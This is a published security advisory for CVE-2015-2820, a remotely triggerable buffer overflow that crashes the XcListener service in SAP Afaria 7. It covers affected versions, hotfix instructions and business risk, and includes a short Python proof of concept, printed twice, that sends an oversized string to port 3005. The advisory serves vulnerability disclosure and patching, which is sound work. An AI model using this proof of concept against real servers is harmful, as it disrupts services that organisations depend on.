ERPScanERPSCAN-15-008SAP Afaria 7 XcListener - Buffer overflow
0.012 Low
EPSS
Percentile
85.5%
Application: SAP Afaria 7.0.6001.5 Vendor URL:http://www.sap.com **Bugs:**BoF **Reported:**09.12.2014 **Vendor response:**10.12.2014 **Date of Public Advisory:**15.03.2015 **Reference:**SAP Security Note 2132584 Author: Vahagn Vardanyan (ERPScan)
Vulnerability information
Class: DoS [CWE-400]
Impact: DoS
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2015-2820
Business Risk
It is possible to use denial of service to terminate the process of the vulnerable component. As a result, nobody can use this service, which has a negative influence on business processes. System downtime also harms business reputation.
Description
An anonymous attacker can use a special request to crash the XcListener process on the server.
VULNERABLE PACKAGES SAP Afaria 7 Other versions are probably affected too, but they were not checked.
Solutions and workarounds
A vulnerability has been discovered in certain landscape configurations of SAP Afaria that utilize XcListener for initiating client-to-server communications. SAP has released security patches for the vulnerable clients, Windows Mobile, Windows CE, and Windows. Windows Phone is not affected. SAP strongly recommends that customers patch their servers.
Patching instructions:
- Download hotfix
- SAP Afaria 7 SP5 Hotfix 8
- SAP Afaria 7 SP4 Hotfix 16
- Apply server hotfix
The server version of XcListener will be patched when the hotfix is applied. The clients will be updated through the Afaria ESD process as they connect to the server.
Technical description
An anonymous attacker can use a special request to crash the XcListener process on the server.
Proof of concept
import socket HOST = AFARIA_IP # The remote host PORT = 3005 # The same port as used by the server s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) PoC = ‘A’*4098 s.send(PoC) data = s.recv(1024) s.close() print ‘Received’, (data)
1
2
3
4
5
6
7
8
9
10
11
|
import socket
HOST = AFARIA_IP # The remote host
PORT = 3005 # The same port as used by the server
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
PoC = ‘A’*4098
s.send(PoC)
data = s.recv(1024)
s.close()
print ‘Received’, (data)
—|—
Defense
To prevent this issue as well as a plethora of other vulnerabilities that may affect your systems, ERPScan provides the following services:
* [SAP Vulnerability Assessment](<http://erpscan.com/services-2/sap-vulnerability-assessment/>)
* [SAP Security Assessment](<http://erpscan.com/services-2/sap-security-assessment/>)
* [SAP Security Trainings](<http://erpscan.com/services-2/sap-security-trainings/>)
* [SAP Custom code security review](<http://erpscan.com/services-2/sap-custom-code-security-review/>)
* [SAP Penetration testing](<http://erpscan.com/services-2/sap-penetration-testing/>)
Related
